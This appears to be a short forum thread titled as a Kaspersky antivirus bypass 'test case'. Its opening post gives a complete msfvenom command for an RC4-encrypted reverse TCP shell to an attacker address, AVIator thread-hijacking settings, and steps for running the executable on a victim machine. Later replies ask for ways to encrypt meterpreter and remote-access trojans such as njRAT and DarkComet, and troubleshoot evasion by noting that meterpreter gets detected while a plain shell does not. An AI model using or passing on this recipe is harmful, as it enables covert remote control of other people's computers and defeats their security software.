Kaspersky AV bypass Test Case

[Ch0pin]

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)
Getting a shell in a windows 10 machine running fully updated kaspersky AV

Target Machine: Windows 10 x64
Create the payload using msfvenom

msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

Use AVIator with the following settings

Target OS architecture: x64

Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)

Target procedure: explorer (leave the default)

Set the listener on the attacker machine

Run the generated exe on the victim machine

[pretech86]

Thanks for your efforts it working well

Do you have any tool like Aviator but for encrypt exe payload like meterpreter also for encrypting malware servers like njrat and darckcommet

Thanks a lot

[Ch0pin]

Thanks for your efforts it working well

Do you have any tool like Aviator but for encrypt exe payload like meterpreter also for encrypting malware servers like njrat and darckcommet

Thanks a lot

not yet , but this is something that for sure I am going to implement in the very near feature

[pretech86]

my Dear
i test the windows/ meterpreter/reverse/https and tcp there's no reverse connections

also when i test x64/shell it working there's a reverse connection but no meterpreter channel opened

Once you use meterpreter,the antivirus will detect it.However,shell won't.
Maybe encoding the dropped dll is the best way.

[pretech86]

i use x/64 shell and it worked but no channel open although there's a reverse connection?

[Ch0pin]

Make sure you are selecting the right architecture for your shell code and for your target OS. As pple7000 said when u use meterpreter the Av propably will detect it and drop the connection as suspicious, if you use a simple shell payload the bypass works fine.... Just press few enters after the connection is open ;)